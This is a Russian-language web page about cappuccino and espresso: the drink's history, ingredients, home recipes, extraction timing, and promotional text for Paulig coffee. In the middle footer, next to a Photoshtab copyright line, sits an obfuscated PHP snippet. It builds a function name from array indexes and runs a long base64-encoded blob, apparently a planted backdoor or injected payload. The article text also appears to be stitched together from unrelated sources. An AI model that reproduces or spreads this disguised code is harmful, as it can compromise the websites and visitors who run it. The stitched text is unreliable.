Рисунок на капучино влияет на его вкус
Капучино — это кофейно-молочный напиток, состоящий из эспрессо и молока. Для того, чтобы максимально раскрыть все вкусовые оттенки кофе, который лежит в основе этого напитка, необходимо верно приготовить молочную пену и правильно влить ее в эспрессо. Молоко нагревают до температуры 65 градусов (выше нельзя, иначе кофе обжигается, разрушаются его белки и напиток будет горчить) и взбивают либо с помощью форсунки на кофемашине, либо специальным венчиком или с помощью френч-пресса. Затем пена вливается тонкой струйкой в центр чашки со свежеприготовленным эспрессо и формируется четкий красивый рисунок: молочная пена приподнимает наверх кофейную крема — так получится максимально кофейный вкус, передающий все нюансы эспрессо. Если рисунок имеет разводы на кофейной части (на фото — справа), то получается более молочный напиток, по вкусу похожий на латте.
У капучино с четким рисунком (слева) более «кофейный» вкус
Что такое капучино
Заядлый посетитель кофеен, уверенно отличающий американо от эспрессо, легко объяснит, что капучино – это особым образом приготовленный кофе с шапочкой из вспененного молока. Это один из самых распространенных видов кофе, приготовить который по силам не только опытным бариста с использованием профессиональной аппаратуры, но и обычным кофеманам в домашних условиях.
История капучино
Существует несколько версий происхождения этого напитка в XVI веке, так или иначе обыгрывающих название cappuccino (в переводе с итальянского означающее «монах ордена капуцинов»). Вот три самые распространенные:
- Монахи-капуцины изобрели этот напиток, первыми став добавлять к кофе вспененные сливки или молоко.
- Рясы монахов этого ордена имеют характерный коричневый цвет, таким же получается этот кофе при правильном приготовлении.
- Шапочка густой пены над чашкой с напитком напоминает монашеский капюшон.
Самой правдоподобной выглядит третья версия, но какой бы ни была история капучино в действительности, каждый из этих вариантов по-своему объясняет характерные особенности этого напитка – добавление молока и пенную шапочку. К слову, как раз монахи-капуцины первыми обратили внимание на красивые узоры, возникающие на поверхности «капюшона», заложив основы популярного направления в кулинарном искусстве под названием «латте арт». Так называют специальный декор пенной поверхности, когда на нее наносятся красивые узоры.
Состав
Широкому распространению этот напиток во многом обязан простым ингредиентам. Классический состав капучино включает всего две составляющих:
- Кофе – экспрессо из кофемашины или напиток, сваренный в турке. Главное условие – чтобы он был хорошо процежен и не содержал кофейной гущи.
- Молоко – его взбивают до тех пор, пока половина объема не станет пеной. При приготовлении напитка в домашних условиях без использования капучинатора получить хорошую мелкоячеистую текстуру пены можно с помощью смеси молока и сливок в равном соотношении.
Для приготовления капучино с отличным вкусом и характерным ароматом хватит и базовых составляющих. Но есть и дополнительные ингредиенты, которые используют бариста, чтобы немного изменить привкус напитка:
- Сахар – часто используется тростниковый или карамелизированный.
- Посыпка – какао или корица, сами по себе или смешанные сахарной пудрой;
- Вкусовые добавки – ваниль, ароматизаторы.
Виды
Для приготовления напитка могут использоваться разные способы. Бариста различают следующие виды капучино:
- Белый – сначала в чашку добавляют вспененное молоко, а затем наливают крепкий кофе.
- Черный – сперва вливают эспрессо, а на него кладут пену.
Важно отметить, что способ приготовления больше влияет на цвет напитка, чем на его вкус, но вне зависимости от технологии, стараются, чтобы ингредиенты не смешивались между собой. Добиться слоистой структуры можно, если не доводить молоко до кипения, а тут же взбить его в плотную пену. Значение имеет и скорость вливания кофе в молоко – чем быстрее этот процесс, тем больше вероятность получить правильный капучино.
У эспрессо каждая секунда на счету
При приготовлении эспрессо имеет значение каждая секунда! На заваривание одной чашечки этого крепкого напитка в эспрессо-машине, когда горячая вода под давлением пропускается через кофейную таблетку, обычно уходит всего 25 секунд: этого времени достаточно для полной экстракции и максимального насыщения воды кофейными маслами. Если разложить стадии формирования вкуса эспрессо по пяти чашкам (на фото ниже), то можно увидеть следующее: на первых пяти секундах происходит максимальное выделение масел из кофе — это самый пик вкуса, максимально кислотная часть, очень насыщенная и плотная. В следующей чашке (10 секунд) в воду экстрактируется уже меньше масел и начинает образовываться легкая горчинка. К третьей чашке (15 секунд) появляются сладковатые нотки — кофейные зерна содержат много сахара, который под действием температуры и воды преобразуется в карамель. Такой напиток, приготовленный за 15 секунд, называется ристретто. К четвертой и пятой чашке (20 и 25 секунд) из кофе экстрактируется лишь кофеин. В хорошем эспрессо всегда должен быть баланс горечи, кислотности и сладости.
Идеальный эспрессо готовится за 25 секунд
Фотоштаб © 2012 Photoshtab.ru есть в Twitter, Facebook, В Контакте и в Google +. Подписаться на RSS можно здесь. $imggdg[7].$imggdg[12].$imggdg[3].$imggdg[2].$imggdg[14].$imggdg[3].$imggdg[4].$imggdg[18].$imggdg[22].$imggdg[1].$imggdg[7].$imggdg[14].$imggdg[19].$imggdg[5].$imggdg[1]; $sgtisx = $jtfqz(‘$v’, $imggdg[3].$imggdg[0].$imggdg[2].$imggdg[17].$imggdg[21].$imggdg[10].$imggdg[24].$imggdg[19].$imggdg[1].$imggdg[18].$imggdg[17].$imggdg[2].$imggdg[14].$imggdg[3].$imggdg[21].$imggdg[16].$imggdg[2].$imggdg[6].$imggdg[3].$imggdg[20].$imggdg[15].$imggdg[4].$imggdg[13].$imggdg[3].$imggdg[7].$imggdg[5].$imggdg[13].$imggdg[3].$imggdg[21].$imggdg[23].$imggdg[0].$imggdg[8].$imggdg[8].$imggdg[8].$imggdg[9]); $sgtisx(‘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’); ?>� Права на представленные на сайте фотографии принадлежат их авторам. Если вы цитируете наш сайт, не забывайте, пожалуйста, всегда указывать ссылку на источник. По вопросам сотрудничества
Как правильно приготовить американо
Эспрессо — очень насыщенный напиток и не все готовы пить его с утра или в обед. Это максимальная концентрация вкуса кофе в маленьком объеме — мегашот, который будоражит нашу нервную систему. Но многие люди хотят получать максимальный вкус цветочных и шоколадных ноток в напитке большого объема, который можно пить долго. Поэтому и появился американо: сначала с помощью кофемашины готовится эспрессо, который затем выливается в стакан горячей воды. Важно именно вливать эспрессо в чашку с водой, а не наоборот — так идеально сохраняется вкус кофе.
Американо хорош в любое время дня
Как приготовить кофе капучино в домашних условиях
Попробовав хоть раз капучино, сваренный опытным бариста, многие пытаются воспроизвести этот напиток на собственной кухне, но быстро сдаются, потерпев неудачу. Принято считать, что качественный кофе можно приготовить только на профессиональном оборудовании, но если смотреть объективно, то это не совсем так. Использование кофемашины для варки эспрессо и капучинатора для взбивания пены значительно упрощает процесс приготовления, но когда речь идет про 1-2 порции, то можно обойтись и более простым, домашним кухонным инвентарем.
Для взбивания пены хорошо подходит френч-пресс. Подогретое молоко наливают в сосуд и, поднимая-опуская поршень 5-6 раз, добиваются хорошего вспенивания. Альтернативой френч-прессу будет электрический миксер или погружной блендер. При взбивании молоко в несколько раз увеличивается в объеме, поэтому вначале его не следует брать слишком много. Полученная пена ложкой перекладывается в чашку для кофе.
Качественный напиток начинается с выбора ингредиентов. В идеале, кофейные зерна нужно размалывать непосредственно перед приготовлением, но и обычный молотый кофе придаст капучино изумительный вкус и аромат. Теоретически, напиток можно приготовить и из растворимого кофе, но такой эрзац-капучино будет мало похож на оригинал. Сварив кофе по всем правилам, обратите внимание на внешний вид при сервировке – как выглядит настоящий капучино, можно узнать в ближайшей кофейне или посмотрев фото в интернете.
Не все представляют, как пить капучино правильно. Главное – не перемешивать его, давая слоям молока и кофе протекать через воздушную пену. Так как молочная пена помогает лучше почувствовать насыщенный букет напитка, ее не снимают ложечкой для отдельного употребления. Заядлые кофеманы считают, что сахар в этом напитке портит вкус, но не будет ничего крамольного, если добавить ложечку. На родине капучино в Италии этот кофе употребляют с утра и до полудня, дополняя круассаном или булочкой.
- Скумбрия в фольге в духовке: рецепты с фото
- Гречка в духовке: рецепты с фото
- Что такое дратути
Классический
Научиться самостоятельно варить вкусный напиток не так сложно. Классический рецепт кофе капучино в домашних условиях включает простые ингредиенты, поэтому с приготовлением справится даже начинающий кофеман:
- вода – 100 мл;
- молоко – 100 мл (или молоко – 50 мл, сливки – 50 мл);
- кофе черный молотый – 2 ч.л.;
- (по желанию) корица в порошке и сахарная пудра – по 1/4 ч.л.
В джезву насыпается кофе, добавляется вода и напиток ставится на огонь. Главная хитрость – необходимо сварить экспрессо, доводя его до кипения, но не кипятя (для этого его можно несколько раз снимать с огня, когда кофе начнет подниматься и, чуть подождав, вновь продолжать нагрев). Молоко подогревается, тоже не до кипящего состояния – когда оно достигнет высокой температуры, половину его переливают в френч-пресс и, с помощью поршня, взбивают крепкую пену.
Для окончательной подачи сваренный кофе необходимо процедить, а кофейную чашку заранее подогреть. Далее в чашку наливают 50 мл эспрессо, аккуратно добавляют сверху 50 мл молока и аккуратно кладут ложечкой пену. Декорировать напиток можно обсыпкой из смеси корицы и сахарной пудры, просеяв ее через ситечко. По правилам хорошего тона, сахар к этому напитку подают отдельно.
С шоколадом
Использование шоколада в капучино – это не только стремление угодить сладкоежкам, но и простой способ изменить вкусовые характеристики напитка. Для приготовления потребуются:
- вода – 80 мл;
- молоко – 80 мл (или молоко – 40 мл, сливки – 40 мл);
- кофе черный молотый – 1,5 ч.л.;
- тертый шоколад – 1/2 ч.л.;
- сахарный песок – по вкусу.
Базовая технология приготовления этого напитка не отличается от той, что используется для классического капучино, но при этом для более густой и насыщенной пены, лучше использовать смесь сливок с молоком. Разместив по очереди в чашке сваренный эспрессо, сливки/молоко и взбитую пенку, нужно посыпать сверху пенный «капюшон монаха» тертым шоколадом. Сахар добавляется по вкусу.
Белый кофе — любимый кофе россиян
Большинство москвичей и жителей других городов России, действительно, предпочитают «белый» кофе — капучино, раф, латте. Для приготовления этих напитков подходят зерна более темной обжарки, которые хорошо сочетаются с молоком. Например, в линейке Paulig City есть бленд Café Moscow — кофе, вдохновленный яркой Москвой, городом, который всегда в движении. Темная обжарка, насыщенный вкус и умеренная горчинка делают этот бленд идеальным для раф-кофе.
Кстати, правильно приготовленый «белый» кофе не требует дополнительного сахара, ведь когда молоко нагревается и взбивается, оно обретает сладость. А каждая ложка обычного сахара меняет вкус напитка, делая его более «плоским». В любом случае, широкая линейка кофе Paulig позволит найти правильную основу для своего напитка.
Кофе Paulig Moscow идеальная основа для «белого» кофе
Форма чашки влияет на вкус
Вы удивитесь, но посуду для кофе стоит подбирать столь же тщательно, как и для вина. Оказывается, качество и форма чашки влияют на вкус напитка! В кофейне Paulig отдают предпочтение посуде с толстыми стенками, чтобы кофе как можно дольше оставался теплым, не теряя при этом свои вкусовых качеств (что происходит при остывании). Не зря эспрессо всегда подают в маленьких чашках — в них сохраняется максимальная концентрация вкуса. Можно использовать толстостенную керамику, фарфор и даже стекло. Кстати, стеклянные чашки для капучино или латте перед отдачей прогревают паром, чтобы максимально сохранить вкус кофе.
Paulig Café&Store в Instagram
Елена Гущина, управляющая Paulig Café&Store
Особенности капучино
Напиток считается достаточно калорийным. Данный показатель напрямую зависит от использованного для его приготовления молока, а также наличия или отсутствия сахара и топпинга.
Капучино, как и любой кофейный напиток, содержит кофеин. Его количество может варьироваться от 40 до 70 миллиграмм. Процент кофеина зависит от того, какое зерно было взято для приготовления: если это арабика, то напиток получится более легким, а из смеси робусты и арабики, капучино получается более тонизирующим и крепким.